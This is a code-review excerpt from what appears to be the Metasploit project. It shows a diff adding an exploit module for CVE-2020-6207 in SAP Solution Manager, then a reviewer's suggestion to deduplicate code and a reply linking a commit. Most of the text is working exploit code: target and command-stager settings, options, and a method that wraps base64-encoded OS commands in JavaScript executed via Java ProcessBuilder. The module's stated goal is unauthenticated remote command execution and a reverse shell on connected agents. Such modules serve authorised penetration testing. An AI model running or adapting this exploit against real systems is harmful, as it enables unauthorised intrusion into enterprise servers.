modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb

```diff
@@ -0,0 +1,156 @@
+          SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
+          checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
+          send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.
+
+          Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan
+          agent as the user under which it runs SMDAgent service, usually daaadm.
+        },
+        'References' =>
+          [
+            ['CVE', '2020-6207'],
+            ['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
+            ['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
+          ],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Linux',
+            {
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Platform' => 'linux',
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne']
+            }
+          ],
+          [
+            'Windows',
+            {
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Platform' => 'win',
+              'CmdStagerFlavor' => ['certutil', 'vbs', 'debug_write', 'debug_asm']
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2020-10-03'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(50000),
+        OptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
+        OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),
+      ]
+    )
+  end
+
+  def setup_variables
+    @host = datastore['RHOSTS']
+    @port = datastore['RPORT']
+    @lhost = datastore['LHOST'] || '0.0.0.0'
+    @lport = datastore['LPORT'] || 4444
+    @path = datastore['TARGETURI']
+
+    @agent_name = datastore['AGENT']
+    @script_name = Rex::Text.rand_text_alphanumeric(12)
+
+    if datastore['SSL']
+      @schema = 'https://'
+    else
+      @schema = 'http://'
+    end
+
+    @solman_uri = "#{@schema}#{@host}:#{@port}#{@path}"
+  end
+
+  def execute_command(cmd, opts = {})
+    setup_variables
+    command = "var d = Packages.java.util.Base64.getDecoder().decode('#{Rex::Text.encode_base64(cmd)}');"
+    command << 'var c = new Packages.java.lang.String(d);'
+    command << 'var b = new Packages.java.lang.ProcessBuilder();'
+    case opts[:agents_os]
+    when /windows/i
+      command << 'b.command("cmd.exe","/c",c).start().waitFor();'
+    else
+      command << 'b.command("bash","-c",c).start().waitFor();'
+    end
+    rce_payload = make_rce_payload(command)
```

Comment:
I think it'd make sense to reduce the code duplication here by moving this into `make_rce_payload` and adding a parameter to handle the shell like `is_windows` or `os`.

Reply:
Updated payload: https://github.com/rapid7/metasploit-framework/pull/14924/commits/0487e451cff0fce1a582df39213291efc9babd53